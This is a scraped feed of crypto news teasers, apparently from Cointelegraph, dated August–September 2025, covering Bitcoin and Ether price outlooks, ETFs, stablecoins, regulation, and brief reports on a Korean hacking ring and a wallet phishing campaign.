Meanwhile, a recent Pew Research Center Study that surveyed 9,593 Americans found that in 2024, about 28% of people said they consulted astrology at least once a year. Social media is also chock-full of stock and crypto traders who claim to use their high self to win in the stock market. 

Read more

Article link

Date of publish: Wed, 03 Sep 2025 14:20:00 +0100

Bitcoin to see ‘one more big thrust’ to $150K, ETH pressure builds: Trade Secrets

Bitcoin still has time for one more surge to $150,000 says Peter Brandt, as retail sentiment around Solana soars: Trade Secrets.

Welcome to Trade Secrets Bitcoin and Ether price predictions from top analysts, along with options data, sentiment analysis and prediction markets to determine what they can tell us about the months and years ahead.

After soaring to new highs in August, Bitcoin is now facing a critical test for its next major move, according to veteran trader Peter Brandt.

I think there is still room for one more big thrust, perhaps to $125,000 to $150,000, but it is running out of time, Brandt tells Magazine.

Read more

Article link

Date of publish: Tue, 02 Sep 2025 14:31:48 +0100

XRP ‘cycle target’ is $20, Strategy Bitcoin lawsuit dismissed: Hodler’s Digest, Aug. 24 – 30

Elon Musk’s attorney will chair a company that aims to raise $200 million to invest in DOGE, Ether ETFs cross $13.7 billion: Hodler’s Digest

Ether spot exchange-traded funds (ETFs) have seen steady growth since their US debut in July 2024, while corporate treasuries tied to the token are also on the rise.

Inflows into Ether funds climbed 44% this month, rising from $9.5 billion on Aug. 1 to $13.7 billion on Aug. 28, according to cryptocurrency research platform SoSoValue. Market participants say renewed institutional demand is fueling the momentum.

After an extended period of underperformance relative to Bitcoin and a souring investor sentiment, Ethereum has recently experienced a significant revival in the recognition of both its adoption rate and value proposition, Sygnum Chief Investment Officer Fabian Dori told Cointelegraph.

Read more

Article link

Date of publish: Sun, 31 Aug 2025 00:29:00 +0100

BTS Jungkook’s hacker, Ripple backs Singapore payments firm: Asia Express

BTS Jungkook’s identity thief’s crypto scam ring. Ripple and Circle back Singapore stablecoin infrastructure firm. Asia Express

A hacking syndicate accused of stealing 39 billion won ($28 million) by targeting wealthy corporate executives and celebrities including BTS member Jeon Jung-kook has been arrested by South Korean police.

A Seoul police unit said Thursday it had apprehended 18 suspects who allegedly hacked government agencies, public institutions and IT platforms to obtain personal and financial data from 258 victims, according to local media reports. The stolen information was then used to break into bank, securities and cryptocurrency exchange accounts.

Police said the group successfully stole 39 billion won from 16 victims and attempted to defraud another 25 billion won from 10 others, bringing total damages to 64 billion won. Among the victims were three celebrities and two corporate leaders from South Koreas top 100 companies. The largest confirmed theft amounted to 21.3 billion won in crypto.

Read more

Article link

Date of publish: Fri, 29 Aug 2025 02:00:00 +0100

The one thing these 6 global crypto hubs all have in common…

Global crypto hot spots are emerging everywhere, from Zanzibar to Sri Lanka and they all have one thing in common.

As the blockchain and cryptocurrency industries scale globally, nations are no longer adopting a wait-and-see attitude; theyre actively competing for a slice of the pie. Governments are recognizing that Web3 is a revolutionary technology with wide-reaching implications for economies, governance and digital infrastructure, and countries are vying to attract the top talent to their shores.

Whats emerging is a new network of crypto tech hubs: jurisdictions building regulatory clarity and fostering innovation to attract the most ambitious developers and companies in the space. The United Arab Emirates (UAE), Hong Kong and Singapore are among the best known, but there are many regions lining up to shape the next phase of decentralized innovation.

But theres one thing that most crypto hubs have in common. See if you can spot what it is, but well let you know at the end.

Read more

Article link

Date of publish: Thu, 28 Aug 2025 14:20:00 +0100

3 people who unexpectedly became crypto millionaires… and one who didn’t

Crypto has the potential to make ordinary people hilariously rich. Here’s three real life tales, and one guy who sold free Bitcoin too early.

A surprise manila folder with millions of Bitcoin, a memecoin that went to the moon and a series of high-stakes poker games these are some true-life tales of people who struck it rich with crypto.

While there are many stories of skilled traders, miners and gamers who became self-made crypto millionaires, the more interesting ones are those who stumbled into crypto and accidentally struck digital gold.

It was 2013. Two freshman students were sitting at a bar. The guy, a nerdy computer type, was interning at Goldman Sachs. He told the girl lets call her Anna You should invest in Bitcoin. The girl, who had the resources, said, Sure.

$10,000 was exchanged, and Anna forgot about it. 

Read more

Article link

Date of publish: Wed, 27 Aug 2025 14:30:00 +0100

Bitcoin is ‘funny internet money’ during a crisis: Tezos co-founder

Tezos co-founder Arthur Breitman says there will always be a group of people who own Bitcoin based on it being “funny internet money.”

Bitcoin may be hailed as digital gold on Wall Street, but when a real crisis hits, many will treat the cryptocurrency like fantasy play money, says Tezos co-founder Arthur Breitman.

But why on earth would a crypto builder of almost a decade say such a thing?

What about all the institutional money pouring in, the billions flowing into spot Bitcoin ETFs and its narrative as a safe-haven asset?

Read more

Article link

Date of publish: Tue, 26 Aug 2025 14:30:00 +0100

ETH ‘god candle,’ $6K next? Coinbase tightens security: Hodler’s Digest, Aug. 17 – 23

All eyes are on Ether as it hits new highs for the first time since 2021, while Coinbase ramps up workplace security: Hodler’s Digest

The total US dollar-pegged stablecoin market is projected to swell to $1.2 trillion by 2028, spurred on by comprehensive crypto regulations in the United States, according to crypto exchange Coinbase.

Coinbase said the projections mean the US Treasury issuance would have to be $5.3 billion per week over the next three years to satisfy demand from stablecoin issuers, who use short-term US Treasury bills as backing collateral for their digital fiat tokens.

This issuance schedule would cause a minor and temporary drop in three-month Treasury yields of about 4.5 basis points, contrary to analyst predictions that demand from stablecoin issuers will significantly reduce the interest on US government debt. Coinbase wrote in a market report:

Read more

Article link

Date of publish: Sun, 24 Aug 2025 00:03:27 +0100

Stablecoins in Japan and China, India mulls crypto tax changes: Asia Express

Major Asian economies step on the stablecoin throttle, India’s reconsiders punitive crypto tax, and more.

Major Asian economies are accelerating their stablecoin initiatives, with notable moves from Japan and China over the past week.

Japans top financial regulator is reportedly preparing to approve the countrys first yen-pegged stablecoin within the year. The token, issued by fintech startup JPYC, will be backed by liquid assets such as government bonds. 

According to finance outlet Nikkei, JPYC is expected to register as a money-transfer business this month and aims to issue 1 trillion yen (about $6.81 billion) worth of stablecoins over the next three years.

Read more

Article link

Date of publish: Fri, 22 Aug 2025 00:00:00 +0100

Can privacy survive in US crypto policy after Roman Storm’s conviction?

Legal experts say Roman Storm’s Tornado Cash conviction underscores the ongoing clash between privacy and security, echoing past encryption fights.

Roman Storms conviction over Tornado Cash has sparked a debate about whether US authorities are narrowing crypto privacy rights despite the White Houses recent report emphasizing the importance of self-custody and individual freedoms.

The case has drawn comparisons to earlier battles over Silk Road, raising questions about criminal intent, control of immutable smart contracts and whether privacy itself can ever outweigh security concerns. Meanwhile, the White House is pushing for a clear taxonomy of digital assets commodity or security highlighting how unresolved definitions and liability standards continue to shape US crypto policy discussions.

To explore the legal implications of Storms conviction and the broader policy context, Magazine spoke with Joshua Chu of the Hong Kong Web3 Association, Yuriy Brisov of UK law firm Digital & Analogue Partners and Charlyn Ho of US law firm Rikka. 

Read more

Article link

Date of publish: Thu, 21 Aug 2025 14:15:05 +0100

Bitcoin’s long-term security budget problem: Impending crisis or FUD?

Critics argue the declining Bitcoin block reward subsidy is a “ticking time bomb” for Bitcoin’s security. Here are some potential solutions.

The key selling point of Bitcoin as a store of value has everything to do with the credibility of its monetary policy. As Bitcoin inventor Satoshi Nakamoto once wrote, the rules of the system were set in stone when the network first launched, and those rules included the 21-million-Bitcoin supply cap and the related issuance policy maintained by the roughly four-year halving cycle.

But are those rules really set in stone? Is there really no chance Bitcoins monetary policy will change at some point in the future? 

Some critics believe that after the block reward drops too low as a result of the halvings and if transaction fee revenue has not risen substantially there will no longer be enough incentive for miners to secure the network. They argue the Bitcoin network may be forced to increase the supply as a result. 

Read more

Article link

Date of publish: Wed, 20 Aug 2025 14:30:00 +0100

Solana Seeker review: Is the $500 crypto phone worth it?

The new Solana seeker struggles against the latest Samsung and iPhones, but with a built-in crypto wallet and at $500, it’s hard to ignore.

Its been two weeks since the worldwide launch of the Solana Seeker, the successor to the Solana Saga. About 150,000 people have begun receiving their phones in the mail, and their reviews are trickling in.

As a general phone, the Seeker may not turn heads. Its measurably slower, and most reviewers say the camera is a far cry from flagship devices like the Samsung S25 Ultra or the iPhone 16 Pro.

As a crypto phone, the jurys still out. The Seeker is arguably miles ahead of anything else due to its Seed Vault, which allows users to securely store their Solana assets.

Read more

Article link

Date of publish: Tue, 19 Aug 2025 14:30:00 +0100

Animoca’s Tower crypto surges 214%, gaming activity up in July: Web3 Gamer

Animoca Brand’s gaming token TOWER grew 8X fast than Ethereum this month; gaming investment and active wallets went up in July. Web3 Gamer.

A gaming crypto token created by Animoca Brands has surged 214% over the past month and caught the eye of savvy investors after the companys popular chairman, Yat Siu, gave it a social media boost.

Tower was the fifth-most popular cryptocurrency among smart investors on the Base network over the past seven days, according to onchain analytics platform Nansen.

Tower is a utility token used across a slew of Animoca titles, including play-to-earn mobile defense game Crazy Kings, Crazy Defense Heroes and real-time PvP fighting game Wreck League.

Siu said the hype for the token came down to excitement around the reboot of Wreck League, as well as momentum from the token trending on Base and Farcaster.

Read more

Article link

Date of publish: Mon, 18 Aug 2025 15:11:34 +0100

Coinbase calls for ‘full-scale’ alt season, Ether eyes $6K: Hodler’s Digest, Aug. 10 – 16

Ether eyes $6,000 as exchange supply falls; Justin Sun sues Bloomberg, seeks temporary restraining order: Hodler’s Digest

Justin Sun, founder of the Tron blockchain, has sued Bloomberg and sought a temporary restraining order, alleging it published false and private financial information in its billionaires list.

Suns representatives said on Tuesday in a blog post by Tron that his profile on the Bloomberg Billionaires Index released on Monday had published inaccurate data that dramatically and dangerously misrepresents Mr. Suns assets.

Sun sued Bloomberg in a Delaware federal court on Monday, asking a judge to stop it from publishing the information, claiming the action was to prevent the outlet from recklessly and improperly disclosing his highly confidential, sensitive, private, and proprietary financial information.

Read more

Article link

Date of publish: Sun, 17 Aug 2025 00:45:05 +0100

South Koreans dump Tesla for Ethereum treasury BitMine: Asia Express

The most popular US stocks in South Korea are Ethereum treasuries and crypto companies, Ant Group denies Yuan stablecoin plan. Asia Express.

South Korean retail investors are selling off their big tech shares such as Tesla and Alphabet in favor of Ethereum-related stocks, The Korea Economic Daily reported, citing data from the Korea Securities Depository.

Tesla has long been a fixture in the top net-buy rankings for Korean retail investors, but it was sold off in the past month with around 1 trillion won ($721.6 million) in net sales. Alphabet and Apple were also heavily sold, with net sales of about 230 billion won ($166 million) and 300 billion won ($216 million), respectively.

These retail investors are locally called seohak ants. Seohak translates to Western learning, but in domestic finance lingo, it refers to foreign stock investors. Ants is a local nickname for retail investors, alluding to their small size but large numbers compared to institutional whales.

Read more

Article link

Date of publish: Thu, 14 Aug 2025 23:57:25 +0100

Everybody hates GPT-5, AI shows social media can’t be fixed: AI Eye

Vitalik Buterin endorses AI doomer book, ChatGPT dietary advice sends man insane, and the funniest thing every written by an AI. AI Eye.

OpenAIs Sam Altman has been talking GPT-5 up as a quantum leap in intelligence for so long, that it was almost inevitable its release would be something of a disappointment.

While its not quite New Coke level bad, its not the reception theyd hoped for.

Social media was immediately flooded with GPT-5 (apparently) giving very stupid answers, including obvious logic flaws, stating that 9.11 is greater than 9.9 and following patterns to the incorrect conclusions.

OpenAIs odds on Polymarket for having the best model by end of August plunged from 75% to just 8% in the aftermath, though its climbed back to 24% since. 

Read more

Article link

Date of publish: Thu, 14 Aug 2025 15:00:00 +0100

Altcoin season 2025 is almost here… but the rules have changed

Altcoin season may finally upon us — but it’s not the altseason you remember. Wall Street money and infinite memecoins have changed the game.

Theres probably nothing more reliable in crypto than traders yelling ALTSEASON IS HERE every time Bitcoin stumbles against altcoins. 

Heck, theyve been saying it religiously since mid-2024, and theyre starting to do it again now after Bitcoin dominance fell under 60% over the weekend, its lowest level since February. 

Except this time, they may be onto something; ETH is within sight of new all-time highs, and other altcoins are looking ready to pounce.

Read more

Article link

Date of publish: Wed, 13 Aug 2025 14:49:17 +0100

Scottie Pippen says Michael Saylor warned him about Satoshi chatter

NBA legend Scottie Pippen reveals his friend Michael Saylor advised him to stop talking publicly about his dream conversations with Satoshi.

One of the greatest NBA basketball players of all time, Scottie Pippen recently got a stern warning from Strategys executive chairman, Michael Saylor.

This wasnt just any ask; its tied to one of the biggest mysteries in Bitcoin.

My guy, Michael Saylor, asked me not to speak on my conversations with Satoshi, Pippen tells Magazine.

Read more

Article link

Date of publish: Tue, 12 Aug 2025 15:30:00 +0100

Buterin’s ETH treasury warning, Bitcoin $250K a ‘maybe’: Hodler’s Digest, Aug. 3 – 9

Changpeng Zhao asks the court to dismiss a lawsuit by FTX, Tom Lee says $250,000 is still in sight for BTC this year: Hodler’s Digest

Crypto investors may be underestimating the extent of the US securities regulators new stance on crypto, meaning that crypto prices would still have room to grow, according to Bitwise chief investment officer Matt Hougan. 

US Securities and Exchange Commission Chair Paul Atkins published a speech he gave on July 31 at the America First Policy Institute about how blockchain will be integrated into the financial markets.

Hougan on Tuesday said the speech caught him off guard and left him wondering whether Atkins vision had been priced into the market. 

Read more

Article link

Date of publish: Sun, 10 Aug 2025 01:31:24 +0100

Philippines blocks big crypto exchanges, Coinbase scammer’s stash: Asia Express

ISPs in the Philippines have blocked access to exchanges including OKX, Bybit and Bitget; Singapore exchange sued by investors: Asia Express.

Members of the crypto community in the Philippines say local internet service providers have begun blocking access to several unlicensed cryptocurrency exchanges.

The move follows a warning issued Monday by the Securities and Exchange Commission (SEC), which flagged 10 exchanges, including OKX, Bybit and Bitget, for operating without a license.

Several users report they can no longer access these exchanges websites, though mobile apps remain functional for now. However, previous enforcement history suggests that app access may also be restricted soon.

Read more

Article link

Date of publish: Fri, 08 Aug 2025 00:53:50 +0100

Moonbirds floor price surges: Can Spencer pull a Luca Netz? NFT Creator

Fifty-one days in and Spencer’s attempts to engineer a turnaround for Moonbirds has already seen the floor price quadruple to 2.36 ETH.

Moonbirds are back. The once maligned project that still ranks in the top 10 for all-time trade volume at 356,000 ETH has skyrocketed back up the NFT charts to 2.36 ETH, quadrupling its floor price in the past month. 

But its definitely spent some time in the wilderness due to multiple ownership changes, directionless plans and waning community sentiment. The NFT project had one of the most highly anticipated mints ever in April 2022, and with prices once again soaring and momentum building, much of the renewed optimism centers around one name: Spencer.

Known simply as Spencer on X, the new owner of Moonbirds is no stranger to NFTs hes a prolific collector and head of Spencer Ventures, an institutional-grade NFT fund.

Read more

Article link

Date of publish: Thu, 07 Aug 2025 15:30:00 +0100

How Ethereum treasury companies could spark ‘DeFi Summer 2.0’

Billions worth of ETH raised by Ethereum treasury companies will flow into DeFi chasing yields up to 14%. Get set for DeFi Summer 2.0.

Since they emerged from stealth mode two months ago, a dozen Ethereum treasury companies have bought 2 million ETH between them, with Standard Chartered analysts estimating theyll add another 10 million to that pile over time.

Theres growing excitement that billions worth of that ETH could flow into DeFi protocols as firms compete to chase yields greater than the 3%-5% on offer from staking and re-staking.

Etherealizes Vivek Raman tells Magazine healthy competition between treasury companies for yield could light a fire under the DeFi sector before the end of the year.

Im actually pretty excited to see it. This could be the stimulus needed for DeFi Summer 2.0 but on the institutional scale and bigger and better.

GameSquare Holdings, BTCS, BitDigital, The Ether Machine and ETHZilla have all announced plans to juice ETH yields via DeFi, while Tom Lees BitMine Digital and Joe Lubins SharpLink Gaming are staking and restaking their ETH for now, while they refine their DeFi plans.

Read more

Article link

Date of publish: Wed, 06 Aug 2025 15:30:00 +0100

Ether could ‘rip like 2021’ as SOL traders brace for 10% drop: Trade Secrets

If ETH can break above $4,200, it will “rip like 2021” says one analyst, but options data indicates a 10% drop for SOL. Trade Secrets.

Welcome to Trade Secrets Bitcoin and Ether price predictions from top analysts, along with options data, sentiment analysis and prediction markets to determine what they can tell us about the months and years ahead.

XRP is gearing up for a massive 160% surge by the end of 2025, predicts Shubh Varma, co-founder and CEO of Hyblock Capital.

Varma tells Magazine that XRP could hit $7.50 by the end of 2025 if the momentum sustains. His forecast comes after XRP reached a year-to-date high of $3.66 on July 18 but fell short of retesting its official all-time high of $3.84 from January 2018.

Read more

Article link

Date of publish: Tue, 05 Aug 2025 15:30:00 +0100

Here’s what happened in crypto today

Need to know what happened in crypto today? Here is the latest news on daily trends and events impacting Bitcoin price, blockchain, DeFi, NFTs, Web3 and crypto regulation.

Today in crypto, a crypto researcher has high hopes the US government will still form the Strategic Bitcoin Reserve this year, Gemini shares soared on Nasdaq in their first day of trading. Meanwhile newly discovered malware called ModStealer is targeting crypto users across multiple operating systems.

There is a high likelihood that the United States government will form the highly anticipated Strategic Bitcoin Reserve by the end of this year, says Galaxy Digital’s head of firmwide research, Alex Thorn.

However, other industry executives are less confident.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 22:59:15 +0100

‘Strong chance’ US will form Strategic Bitcoin Reserve this year: Alex Thorn

Galaxy Digital’s Alex Thorn says the market is "underpricing" the odds of a US Strategic Bitcoin Reserve forming this year, though others are skeptical.

There is a high likelihood that the United States government will form the highly anticipated Strategic Bitcoin Reserve by the end of this year, says Galaxy Digital’s head of firmwide research, Alex Thorn.

However, other industry executives are less confident.

“I still think there’s a strong chance the US government will announce this year that it has formed the strategic Bitcoin reserve (SBR) and is formally holding BTC as a strategic asset,” Thorn said in an X post on Thursday.

Read more

Article link

Date of publish: Sat, 13 Sep 2025 06:39:08 +0100

Bitcoiners chasing a quick Lambo are heading for a wipeout: Arthur Hayes

Arthur Hayes says that Bitcoiners buying Bitcoin one day and expecting a Lamborghini the next is “not the right way to think about things.”

BitMEX co-founder Arthur Hayes says Bitcoin holders need to be more patient and stop worrying about stocks and gold hitting record highs, because asking why Bitcoin isn’t higher misses the point.

“If you thought you were buying Bitcoin and the next day you were buying a Lamborghini, you’re probably getting liquidated because it is not the right way to think about things,” Hayes told Kyle Chasse in an interview published to YouTube on Friday.

“I’m sorry that you bought Bitcoin six months ago, but anyone who bought it two, three, five, or 10 years ago, they’re laughing,” Hayes said, echoing the frustrations of recent Bitcoin (BTC) buyers who are asking why Bitcoin’s price isn’t trading at $150,000 yet

Read more

Article link

Date of publish: Sat, 13 Sep 2025 04:44:17 +0100

Kalshi ‘ready to defend’ prediction markets amid Massachusetts lawsuit

In comments to Cointelegraph, Kalshi claimed that Massachusetts is “trying to block Kashi’s innovations by relying on outdated laws."

Prediction market platform Kalshi has vowed to fight a new lawsuit from the US state of Massachusetts, which accuses the company of offering unlicensed sports betting to residents.

“We are proud to be the company that has pioneered this technology and stand ready to defend it once again in a court of law,” a spokesperson for Kalshi told Cointelegraph on Friday.

“Prediction markets are a critical innovation of the 21st century, and all Americans should be able to access them,” Kalshi added. 

Read more

Article link

Date of publish: Sat, 13 Sep 2025 02:07:35 +0100

Tron’s gas fee reduction cuts daily revenue by 64% in 10 days

Even after the change, Tron still holds a significant lead in revenue among layer-1 blockchains, including Ethereum, Solana and BNB Chain.

Tron’s recent fee reduction has significantly cut into the revenue earned by its block producers, according to a new report from CryptoQuant.

The total daily network fees for Tron’s block producers, known as Super Representatives, dropped to $5 million on Sept. 7, the lowest level in over a year. That’s a 64% revenue decline in 10 days, down from $13.9 million the day before lower fees were implemented.

Onchain data shows that average gas fees on Tron have decreased by 60% after the network implemented a proposal slashing the energy unit price from 210 sun to 100 sun. Gas fees are transaction costs paid on the Tron network, measured in its smallest unit, called sun.

Tron Proposal #789, labeled “Decrease the transaction fees,” went live on Aug. 29 after a vote from the Super Representative community.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 22:52:52 +0100

Blockstream sounds the alarm on new email phishing campaign

The scam is designed to look like a Blockstream Jade hardware wallet firmware update, and links to a malicious site.

Blockstream, an infrastructure and hardware wallet provider, issued a warning about a new email phishing campaign attempting to target Blockstream Jade hardware wallet users.

The company confirmed on Friday that it never sends firmware files through email and said that no data has been compromised in the attack.

Phishing attacks are designed to steal crypto and sensitive user information through seemingly legitimate communication. According to Blockstream, the email featured a simple message directing users to download the latest version of Blockstream Jade wallet firmware by clicking on a link, which was malicious.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 22:33:00 +0100

Inside the Hyperliquid stablecoin race: The companies vying for USDH

Hyperliquid’s first stablecoin vote has drawn bids from Paxos, Frax, Sky, Agora and newcomer Native Markets, with billions in trading volume and stablecoin flows on the line.

One week after opening a contest to decide the issuer of its first native stablecoin, USDH, Hyperliquid is preparing for a validator vote on Sunday to select the winner in what has quickly become one of the industry’s most closely watched community decisions.

Hyperliquid, a decentralized exchange for perpetual futures that launched its own layer-1 in November 2024, handled $330 billion in trading volume in July with a team of 11 people. USDH will serve as the platform’s first dollar-pegged asset, providing traders with a stable unit of account and collateral option within the Hyperliquid ecosystem.

The vote will decide which company controls the exchange’s canonical stablecoin and gains access to billions in stablecoin flows.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 22:13:51 +0100

OpenAI, Microsoft reach restructuring agreement over for-profit arm

The company signaled it would need the green light from California and Delaware policymakers as part of the restructuring plan.

Artificial intelligence company OpenAI has signed a non-binding memorandum of understanding with its largest investor, Microsoft, to restructure its business.

In a Thursday notice, OpenAI said the move, first proposed in May, would allow its for-profit arm to transition to a public benefit corporation, while the nonprofit would maintain control of the company.

Under the deal, the nonprofit arm will have a stake worth more than $100 billion in the public benefit corporation.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 21:51:50 +0100

Bitcoin miner accumulation reaches pace not seen since 2023: Are new BTC highs next?

Bitcoin miners’ current rate of accumulation mirrors a pattern that fueled a 48% rally in 2023, but macroeconomic risks could cap BTC’s gains.

Key takeaways:

Strong Bitcoin miner and corporate BTC accumulation fuel speculation on BTC price surpassing $140,000.

Investors’ rising inflation expectations and weakening consumer sentiment could prevent BTC from hitting new highs.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 21:15:48 +0100

Crypto Biz: From memes to mandates, institutions recast crypto in 2025

Institutions take the wheel in 2025: HSBC and BNP join Canton, billion-dollar crypto treasuries emerge, Gemini eyes IPO and tokenized gold enters IRAs.

Major financial institutions are reshaping crypto’s narrative in 2025, marking a departure from earlier cycles defined by retail speculation, memecoins and digital art alongside Bitcoin’s rise.

Two of the world’s largest banks — HSBC and BNP Paribas — have joined the tokenization-focused Canton Foundation, following the likes of Goldman Sachs and other major backers as institutions push to bring blockchain-based utility to clients.

At the same time, crypto markets are seeing a wave of billion-dollar shelf registrations and expanded initial public offering (IPO) plans, underscoring the race to accumulate digital assets and tap public markets.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 21:00:00 +0100

WisdomTree introduces tokenized private credit fund as market crosses $16B

Tokenized private credit and other tokenized alternative funds continue to grow as the legacy financial system migrates onchain.

Asset manager WisdomTree launched its Private Credit and Alternative Income Digital Fund (CRDT), a tokenized private credit vehicle, amid an uptick in firms expanding into the tokenized private credit niche and other tokenized real-world assets (RWAs). 

The fund will include credit extended to private corporations, loans made to real estate investment trusts (REITs), which are funds that track baskets of commercial properties, and debt from business development corporations, which are investment companies that offer financing to other businesses, according to Friday’s announcement.

CRDT is available to retail and institutional investors, expanding access to an asset class typically reserved for institutional and sophisticated investors.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 20:30:29 +0100

Polymarket eyes $10B valuation as prediction market preps US comeback: Report

Polymarket prepares US return with CFTC relief, new funding and a valuation that could soar to $10B as prediction markets gain momentum.

Blockchain-powered prediction market Polymarket is reportedly preparing a US launch that could value the company as high as $10 billion, highlighting the surge of investor interest in prediction markets and crypto ventures.

Citing sources familiar with the conversation, Business Insider reported Friday that Polymarket is exploring re-entering the US while seeking new funding that could more than triple its June valuation of $1 billion. One investor valued the company at up to $10 billion, the report said.

As Cointelegraph reported, Polymarket was raising a $200 million round in June led by Peter Thiel’s Founders Fund, an early backer of companies including OpenAI, Paxos and Palantir.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 20:05:00 +0100

Price predictions 9/12: BTC, ETH, XRP, BNB, SOL, DOGE, ADA, LINK, HYPE, SUI

Solid inflows into spot Bitcoin ETFs signal sustained demand from the bulls, increasing the likelihood of a break above the $117,500 resistance. Will altcoins follow?

Key points:

Bitcoin’s recovery remains on track, backed by solid demand from the spot Bitcoin ETF buyers.

BNB, HYPE, and SOL are leading the altcoin charge higher, signaling solid buying by the bulls. 

Read more

Article link

Date of publish: Fri, 12 Sep 2025 20:03:12 +0100

TON Strategy launches $250M buyback while shares drop 7.5%

Since announcing its pivot to become a TON treasury company, its share price has fallen over 21% as enthusiasm for crypto treasury companies wanes.

TON Strategy Company, previously known as Verb Technology Company, said on Friday it repurchased 250,000 shares of its common stock under its $250 million buyback agreement.

According to the announcement, TON Strategy Company repurchased the shares at $8.32 each, below the treasury asset value of $12.18. The buyback comes just weeks after it revealed a $713 million reserve of Toncoin (TON) tokens on Aug. 21. TON Strategy says its buyback indicates “long-term confidence” in the TON ecosystem.

The TON token is the native cryptocurrency of The Open Network, a project that started in 2018 and was initially conceived to bring blockchain to messaging service Telegram. The crypto token is ranked No. 22 overall in market capitalization, with its price is declining 40.7% year-to-date, according to Cointelegraph indexes.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 19:37:50 +0100

Gemini (GEMI) stock soars in Nasdaq debut amid crypto IPO boom

Gemini’s $425 million Nasdaq debut marks the latest in a wave of blockbuster crypto IPOs, as investor demand surges for digital asset equities.

Shares of Gemini Space Station (GEMI), the digital asset exchange founded by Cameron and Tyler Winklevoss, surged in their market debut on Friday, signaling strong institutional appetite for crypto-related equities.

Gemini shares briefly topped $40 on Friday, according to Yahoo Finance data, before retreating later in the session. By the afternoon, Gemini was trading near $35 a share, up 24% on the day, for a market cap of around $1.3 billion.

The company priced its initial public offering at $28 per share late Thursday — well above its initial target range of $17 to $19, and even higher than the upwardly revised $24 to $26 range.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 19:18:16 +0100

DeFi whale loses $40M as Kinto winds down and SwissBorg suffers hack: Finance Redefined

MYX Finance’s native token was the week’s largest gainer, with an over 1,100% gain. Worldcoin followed with over 90% gains.

An unknown Hyperliquid trader has surpassed James Wynn, becoming the trading platform’s biggest losing whale, with more than $40 million in losses within a month, according to blockchain data. 

Lookonchain revealed that the trader made high-leverage trades, with nearly $40 million loss on Hyperliquid (HYPE), after selling about 900,000 tokens before the asset rebounded. 

The whale later lost another $35 million on an Ether (ETH) position. After that, he pivoted to a short position and then lost another $614,000. His Bitcoin (BTC) position is also underwater, with unrealized losses of nearly $2 million. 

Read more

Article link

Date of publish: Fri, 12 Sep 2025 19:00:00 +0100

Coinbase files legal motion over Gensler, SEC missing text messages

Legal representatives for Coinbase filed a motion for a legal hearing and potential remedies after the SEC failed to comply with FOIA requests.

Coinbase is escalating its dispute with US regulators over past communications involving former Securities and Exchange Commission Chair Gary Gensler.

Coinbase filed a legal motion on Thursday requesting a hearing to address the SEC Office of the Inspector General’s investigation, which found that the agency deleted nearly one year’s worth of text messages from Gensler and other senior officials in “avoidable” errors.

The exchange said the SEC should explain why it did not conduct a full search of agency records, including text messages from Gensler and senior SEC officials, when it requested the messages in several Freedom of Information Act (FOIA) filings from 2023 and 2024.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 17:20:58 +0100

Solana open interest hits $16.6B as traders set SOL price target above $250

Solana futures open interest rose to $16.6 billion as Galaxy and Forward Industries joined the adoption party. Is SOL headed toward $300 next?

Key takeaways:

Solana futures open interest hit $16.6 billion, and its perpetual futures funding rates are stable, hinting at further price upside.

Spot-driven rally pushes SOL price, reinforced by Galaxy and Forward Industries’ buy demand.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 17:05:11 +0100

UK trade groups urge government to include blockchain in US tech cooperation

A coalition of UK trade groups has urged the government to include blockchain and digital assets in its planned “Tech Bridge” collaboration with the US.

United Kingdom trade groups urged the UK government to include blockchain technology in the “Tech Bridge” technology collaboration with the United States.

A dozen UK trade groups representing the finance, technology and crypto industries made the request in a joint letter seen by Cointelegraph and addressed to UK Business Secretary Peter Kyle and Economic Secretary to the Treasury Lucy Rigby.

According to the document, distributed ledger technology should be a “core strand” of the UK-US tech collaboration ahead of next week’s visit by US President Donald Trump.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 16:30:48 +0100

Tether to launch USAT, names ex-Trump adviser as CEO

The former White House crypto adviser, who joined Tether in August, will become CEO of its planned US-regulated, dollar-backed stablecoin project.

Tether announced a new dollar-backed stablecoin and said former White House crypto adviser Bo Hines will become CEO of Tether USAT.

The new stablecoin will be consistent with the reserve requirements and compliance standards of the recently passed GENIUS stablecoin bill, and will use Tether’s Hadron real-world asset tokenization platform, according to a Friday announcement.

Stablecoins recently crossed the $270 billion milestone, according to RWA.XYZ. Tether CEO Paolo Ardoino said:

Read more

Article link

Date of publish: Fri, 12 Sep 2025 16:27:51 +0100

Polymarket partners with Chainlink to improve market resolution accuracy

Polymarket, a Polygon-based prediction platform, is expanding infrastructure through a new partnership with decentralized oracle network Chainlink.

Polymarket, a decentralized prediction market platform, is integrating Chainlink’s oracle network to improve the accuracy and speed of its market resolutions, the companies announced Friday.

Polymarket has partnered with Chainlink to integrate its data standard into Polymarket’s resolution process, according to a Friday press release shared with Cointelegraph.

The collaboration will initially focus on enhancing the accuracy and speed of asset pricing resolutions, with plans to expand into additional markets.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 15:00:00 +0100

Spot Bitcoin ETFs see strong demand as crypto market tops $4T again

Spot Ether ETFs recorded over $230 million in net inflows as of Thursday, recovering from last week’s net outflows of nearly $800 million.

Spot Bitcoin exchange-traded funds (ETFs) saw strong demand this week, recording more than $1.7 billion in inflows before the trading week closes on Friday. 

SoSoValue data showed that the ETFs had a strong week, with Wednesday having nearly $800 million in inflows. As of Thursday, the ETF tracker showed that spot Bitcoin ETFs already had $1.7 billion in net inflows this week.

The strong performance marks the ETFs’ biggest weekly total in nearly two months, highlighting renewed confidence in the asset class. 

Read more

Article link

Date of publish: Fri, 12 Sep 2025 14:40:51 +0100

Gen Alpha will buy Bitcoin over gold

Gen Alpha will grow up with Bitcoin as a cultural and financial native, making it their default store of value over traditional gold investments.

Opinion by: Darius Moukhtarzadeh, Research Strategist at 21Shares

Gold has long been considered the ultimate store of value — shiny, scarce and time-tested. 

For Gen Alpha, however, the first generation truly born into a digital world, that shine is already starting to fade. 

Read more

